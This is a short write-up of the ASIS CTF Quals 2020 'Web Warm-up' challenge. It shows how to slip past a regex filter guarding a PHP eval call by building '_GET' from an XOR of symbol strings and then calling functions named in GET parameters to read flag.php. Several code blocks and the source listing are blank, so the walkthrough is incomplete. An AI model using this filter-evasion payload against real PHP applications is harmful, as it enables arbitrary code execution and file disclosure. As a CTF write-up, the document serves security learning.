Tags: web waf-bypass php waf eval preg_match 


# ASIS CTF Quals 2020 – Web Warm-up

* **Category:** web
* **Points:** 33

## Challenge

> Warm up! Can you break all the tasks? I'll pray for you!
> read flag.php
> Link:

## Solution

You have to read the `flag.php` file. Connecting to the URL you can see the following source code.

/"; // This is: "_GET" string.

Then you can specify the execution of the content of a GET parameter with the following code.

${$_}[_](); // This is $_GET[_]()

So the payload that will be executed by the `eval` instruction will be the following.


Using a payload like the following, will let you to execute the `phpinfo` page.


The complete payload is the following.


It can be composed step by step.

$_="`{{{"^"?<>/"; // This is _GET string representation composed before.
$_0=${$_}[_](${$_}[__]); // This is $_0 = $_GET[_]($_GET[__]) and it is used to perform: file_get_contents("flag.php")
${$_}[___]($_0); // This is $_GET[___]($_0) and it is used to perform: var_dump($_0)

The result of the attack will be the following.

string(46) ""

Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/ASIS%20CTF%20Quals%202020/Web%20Warm-up/README.md).